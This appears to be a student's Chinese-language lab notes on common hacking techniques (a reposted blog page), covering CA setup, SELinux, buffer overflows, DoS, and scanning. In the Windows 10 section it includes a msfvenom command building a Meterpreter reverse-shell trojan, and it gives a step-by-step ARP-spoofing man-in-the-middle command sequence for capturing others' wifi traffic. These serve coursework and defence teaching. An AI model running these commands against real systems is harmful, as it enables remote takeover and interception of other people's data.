2.信息安全之常用黑客攻击手段

news2024/11/23 19:13:54

1.自己也可以建CA系统 winserver2003 https

  1. 准备2台机器xpsp3(证书,Web),在同一网段,https通讯
    –>网络内部网络(同一网段) (iso镜像才有网络和服务…这个镜像已 经安装好了(不能乱删))

  2. sp1 2 3 的网络 改 tcp/ip 属性 ip地址112.26.0.1 和子网掩码255.0.0.0(与ip地址对应,有多少个255就代表是几类地址)
    使用网关和dns公网

  3. 安装IIS 控制面板–>添加组件—>证书服务 asp–>删除 证 书—>名称 jsjC —>控制面板 iis生成加密txt(base64)可以添加 ca在挂起的颁发 得到ca颁发证书

  4. 客户端安装ca颁发的证书 通过https访问

2.攻击win10 kali是黑客集成的工具(实验失败了,回去试试,先打开后监听…)

  1. kali作为攻击机 win10目标机 win10作为物理机(虚拟机的基础)
  2. 目标机(网卡1hostonly,2 NAT)和攻击机(网卡1hostonly)
  3. 输入命令生成木马到本地 kali2win10.exe就是生成的木马
    msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.56.101 LPORT=4444 -o /root/kali2win10.exe
  4. kali监听
  5. 拉入木马关闭win10防火墙 启动木马
  6. kali4444端口监听成功 可以输入命令行操作远程主机
  7. 控制对方桌面

3.操作系统安全,linux安全selinux

  1. (不是每个系统都有这个增强…大便debian没有…)
  2. (linux有root特殊用户,普通人可能删除系统文件) centos,安卓有 ppt7.2
  3. 系统增强 强制访问控制 最小权限管理,可信路径,隐通道分析,加密卡支持
    1.角色管理(分组),用户管理,用户身份(不同情况下用户权限不同)
    在不同组有不同权限
    2.自主访问控制 ACL机制(access control list) 黑名单或白名单
    什么用户可以进入,其他不进入
    3.强制访问控制
    4.,SELinux(security enhanced linux)
    进程只能访问他需要的文件,不能扩大权限

4.安全配置!!!

 #代表文件不能改,追加,修改权限(不大明白)
 chattr +i  /etc/passwd

5.国际(基本)(ISO 欧盟 美国)/国内标准(参考其他)/行业标准/企业标准(最严格)

#取得许可证 #如国际标准 ISO7498-2-1989 ISO7498-T-1989强制
#ISO7498-GJB-1989 国军标,军队使用(不严格,新东西还没有标准)
1.自主保护(最低)
2.系统审计保护级(深信服网络安全,企业行为管理系统,在公司使用微信 音乐等等在软件监控下)(国家也有…)

6.黑客hacker(最开始是代表帮系统管理员找漏洞完善)后来被理解为攻击 cracker骇客 入侵(窃取商业机密卖给竞争对手)

  1. 分类
    1.非破坏性 不是删除数据,让系统不能运行
    2.破坏性 删除数据,窃取机密
  2. 黑客攻击步骤
    1.扫描网络
    2.确定目标
    3.收集信息(有没有打补丁,捏软柿子…)(重要)
    4.获取管理员权限(没有则先得到普通用户)
    5.创建新账号(使用管理员权限) 安装后台 获取信息 攻击其他主机(肉机,替死鬼,ddos)
    6.擦除痕迹
    7.退出主机

7.信息收集

  1. 主动(直接访问对方系统)危险
    ping xxx 看看用户是否在线
    Nmap 探测多个主机在线(网段扫描)
  2. 被动(对主机外围信息收集)
    whois
    host

8.扫描主机漏洞的软件

x-scan设置无条件扫描 扫描漏洞…
advance
analyzer 可以查看到别人ip访问的记录

10.缓冲区溢出攻击(非常普遍,容易实现,可以得到部分实验)(由于指针可以无限扩容引起的)

  1. 处理的数据会放到内存,内存放不下数据 int a=9999会导致内存溢出,
    导致栈溢出,覆盖了之前栈写的代码内容
  2. 实验
    0. virualbox安装增强工具执行了一个 xx.sh脚本c代码
    1. linux编译c
    gcc xxx -o xxx
    2. 发现 后面的代码无法改值
    x=9999 func(1,2,3)[程序中断] x=1 还是9999
    直接修改了内存的数据,把栈里面的某个空间扩大把
    x=1的地址数据挤掉,导致执行不到,指针可以无限扩充空间
  3. 同班同学推荐的网站可以下载系统和发现漏洞 msdn.itellyou.cn

https://v.qq.com/x/page/s32728du1i4.html

11.缓冲区溢出攻击

#可以连接远程 #向远程写脚本 echo xxx>xx.txt
telnet xxip
#连接ftp下载文件的命令,先获得小权限后得超级管理员权限

#修改管理员密码和远程桌面连接端口

#重启靶机,远程连接

12.防范

  1. 关闭授予管理员权限的程序
  2. 系统打补丁
  3. 让自己代码不出漏洞(先定义后使用,而不是 在函数写的时候 int a=10; a=1;要在函数开头就定义)
  4. 缓冲区不可执行 下溢栈直接报错
  5. 编译器边界检查保护缓冲区(代价大)

13.Dos和DDos攻击(denial of server拒绝服务,个人攻击)(把带宽和服务器资源占用,不能正常提供服务)(distributed denial of server分布式的)

  1. 控制了一批肉机,去攻击
    主控端(完全控制的) 代理端(间接控制,部分控制的)
  2. 常见的方式流量攻击/资源耗尽攻击(通过ping耗尽我们的网络带宽,因为网络带宽是有限的…)
    ping proxy flood, sync tcp/udp攻击
  3. 看似合法的(比如下单后取消订单,可能是假订单,只是为了消耗我们的网络和物理资源)
  4. 防范手段
    1.ping 服务器 超时或者丢包,而同一交换机正常 可能被攻击
    2.netstat查看连接的主机
    3.拉满服务器性能和带宽,避免NAT直接连接(设置路由器或防火墙(公网ip少)
    4.网页做成静态页面(攻击一个页面,但是另外一个页面可以用)(没有依靠数据库的)
    5.负载均衡,比如ping 百度有几个ip处理请求
    6.抗ddos的防火墙

14.arp(ip转mac主机[可以修改])欺骗(广撒网,让某个人回应,得ip,mac地址是唯一的) 代替某人应答,改ip和mac为别人的,假冒网关,数据发到我这里
rarp(mac转ip)reverse

在这里插入图片描述

15.中间人攻击技术(用户[能正确响应]—>假网关[中间人]—>真网关->互联网)

  1. arp(协议)命令,可得arp缓存内容,可手动改,有过期时间,交换机更换网线也可以过期删除(必须要和这个ip通信过)
    ipconfig /all #查看本机ip和mac
    ping xxx
    arp -a #查看曾经连接的ip和mac
  2. 实验 攻击机ping欺骗机得arp表,kali欺骗,arp.c来欺骗
  3. 如何wifi得到别人的数据
    1.kali扫描网段的全部ip地址,怎么知道网关
    nmap -sP 192.168.0.1-254
    2.得到网关
    netstat -rn
    3.启动ip 转发(kali写好的程序了)
    echo 1 > /proc/sys/net/ipv4/ip_forward
    4.使用 攻击者 发的转给网关,不能关闭窗口
    arpspoof -i eth0 -r 192.168.0.5 -t 192.168.0.1
    5.把网关的内容 转发给 欺骗者,不能关闭窗口
    arpspoof -i eth0 -r 192.168.0.1 -t 192.168.0.4
    6.抓取攻击机发送的图片,打开火狐https不能看到了,只能 看http的(没有加密),所以为什么现在很多网站使用http
    driftnet -i eth0

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/579780.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

opencv_c++学习(二十七)

一、单目相机模型 上图为针孔相机成像原理,蓝色坐标中的O即为镜头光心。成像原理与小孔成像相同。 单目相机映射关系如下: 将上式进行变换,就可以从三位空间映射到2维平面的公式。 相机的畸变公式如下: 二、模型投影函数 vo…

数据结构基础内容-----第五章 串

文章目录 串串的比较串的抽象数据类型串的顺序存储结构朴素的额模式匹配算法kmp模式匹配算法 串 在计算机编程中,串(String)是指由零个或多个字符组成的有限序列。它是一种基本的数据类型,在许多编程语言中都得到了支持和广泛应用…

STM32之SPI和W25Q128

目录 SPI 介绍 SPI 物理架构 SPI 工作原理 SPI 工作模式 W25Q128 介绍 W25Q128 存储架构 W25Q128 常用指令 W25Q128 状态寄存器 W25Q128 常见操作流程 实验:使用 SPI 通讯读写 W25Q128 模块 硬件接线 cubeMX配置 w25q128_write_nocheck流程图 代码&a…

如何在华为OD机试中获得满分?Java实现【最长回文子串】一文详解!

✅创作者:陈书予 🎉个人主页:陈书予的个人主页 🍁陈书予的个人社区,欢迎你的加入: 陈书予的社区 🌟专栏地址: Java华为OD机试真题(2022&2023) 文章目录 1. 题目描述2. 输入描述3. 输出描述…

网络原理(八):HTTPS

目录 HTTP 基本工作流程 利用对称密钥进行加密 利用非对称密钥进行加密 引入了第三方权威机构加密 之前在http 协议中说到:我们现在很少有网站直接使用HTTP 协议的,而是使用HTTPS ,至于什么原因,本篇会介绍清楚。 HTTPS 其实…

C++11 -- lambda表达式

文章目录 lamaba表达式的引入lambda表达式语法lamabda达式各部分说明捕获列表说明 lamaba表达式底层原理探索 lamaba表达式的引入 在C11之前,如果我们想对自定义类型Goods排序,可以根据姓名,价格,学号按照从大到小或者从小到大的方式排序,可是,这样我们要写额外写6个相关的仿函…

以太坊学习三: Merkle树和验证

Merkle tree简介 Merkle树又称为哈希树,是一种二叉树,由一个根节点、若干中间节点和一组叶节点组成。最底层的叶节点存储数据,在它之上的一层节点为它们对应的Hash值,中间节点是它下面两个子节点的Hash值,根节点是最后…

DAY 66 数据库缓存服务——NoSQL之Redis配置与优化

缓存概念 缓存是为了调节速度不一致的两个或多个不同的物质的速度,在中间对速度较慢的一方起到加速作用,比如CPU的一级、二级缓存是保存了CPU最近经常访问的数据,内存是保存CPU经常访问硬盘的数据,而且硬盘也有大小不一的缓存&am…

爆肝整理,最全单元测试-测试用例总结(全覆盖)及拿即用...

目录:导读 前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结(尾部小惊喜) 前言 Python自动化测试&…

Maven私服仓库配置-Nexus详解

目录 一、什么是Maven私服?二、Maven 私服优势三、Maven 私服搭建四、Sonatype Nexus介绍五、Nexus仓库属性和分类六、Nexus仓库配置以及创建仓库七、Nexus配置用户角色八、Maven SNAPSHOT(快照)九、项目当中配置Nexus上传依赖十、项目当中配置Nexus下载依赖十一、测…

人工智能基础部分20-生成对抗网络(GAN)的实现应用

大家好,我是微学AI,今天给大家介绍一下人工智能基础部分20-生成对抗网络(GAN)的实现应用。生成对抗网络是一种由深度学习模型构成的神经网络系统,由一个生成器和一个判别器相互博弈来提升模型的能力。本文将从以下几个方面进行阐述&#xff1…

flutter_学习记录_03_通过事件打开侧边栏

实现类似这样的侧边栏的效果&#xff1a; 可以用Drawer来实现。 1. 在Scaffold组件下设置endDrawer属性 代码如下&#xff1a; import package:flutter/material.dart;class ProductListPage extends StatefulWidget {ProductListPage( {super.key}) ;overrideState<Pro…

首发Yolov8优化:Adam该换了!斯坦福最新Sophia优化器,比Adam快2倍 | 2023.5月斯坦福最新成果

1.Sophia优化器介绍 斯坦福2023.5月发表的最新研究成果,他们提出了「一种叫Sophia的优化器,相比Adam,它在LLM上能够快2倍,可以大幅降低训练成本」。 论文:https://arxiv.org/pdf/2305.14342.pdf 本文介绍了一种新的模型预训练优化器:Sophia(Second-order Clippe…

低资源方面级情感分析研究综述

文章目录 前言1. 引言2. 问题定义、数据集和评价指标2.1 问题定义2.2 任务定义2.3 常用数据集 3. 方面级情感分析的方法3.1 **方面词抽取**3.1.1 基于无监督学习的方法3.1.1.1 基于规则的方面词抽取3.1.1.2 基于统计的方面词抽取 3.1.2 基于有监督浅层模型的方法3.1.3 基于有监…

【C++初阶】类和对象(下)之友元 + 内部类 + 匿名对象

&#x1f466;个人主页&#xff1a;Weraphael ✍&#x1f3fb;作者简介&#xff1a;目前学习C和算法 ✈️专栏&#xff1a;C航路 &#x1f40b; 希望大家多多支持&#xff0c;咱一起进步&#xff01;&#x1f601; 如果文章对你有帮助的话 欢迎 评论&#x1f4ac; 点赞&#x1…

一台服务器通过nginx安装多个web应用

1.首先安装nginx网站服务器 yum install nginx 2.nginx 的主配置文件&#xff1a;/etc/nginx/nginx.conf (一台服务器有两个域名部署) 我们在/etc/nginx/nginx.d/下创建一个conf文件&#xff0c;这个文件会被嵌套到主配置文件当中 server { listen 80; …

《数据库应用系统实践》------ 个人作品管理系统

系列文章 《数据库应用系统实践》------ 个人作品管理系统 文章目录 系列文章一、需求分析1、系统背景2、 系统功能结构&#xff08;需包含功能结构框图和模块说明&#xff09;3&#xff0e;系统功能简介 二、概念模型设计1&#xff0e;基本要素&#xff08;符号介绍说明&…

Netty客户端与服务器端闲暇检测与心跳检测(三)

网络应用程序中普遍存在一个问题&#xff1a;连接假死&#xff0c;连接假死现象是:在某一端(服务器端|客户端)看来,底层的TCP连接已经断开,但是应用程序没有捕获到,因此会认为这个连接还存在。从TCP层面来说,只有收到四次握手数据包,或者一个RST数据包,才表示连接状态已断开; 连…

Spring练习二ssm框架整合应用

导入教程的项目&#xff0c;通过查看源码对aop面向切面编程进行理解分析 aop面向编程就像是我们给程序某些位置丢下锚点&#xff08;切入点&#xff09;以及当走到锚点时需要调用的方法&#xff08;切面&#xff09;。在程序运行的过程中&#xff0c; 一旦到达锚点&#xff0c;…

f-stack的源码编译安装

DPDK虽然能提供高性能的报文转发&#xff08;安装使用方法见DPDK的源码编译安装&#xff09;&#xff0c;但是它并没有提供对应的IP/TCP协议栈&#xff0c;所以在网络产品的某些功能场景下&#xff08;特别是涉及到需要使用TCP协议栈的情况&#xff09;&#xff0c;比如BGP邻居…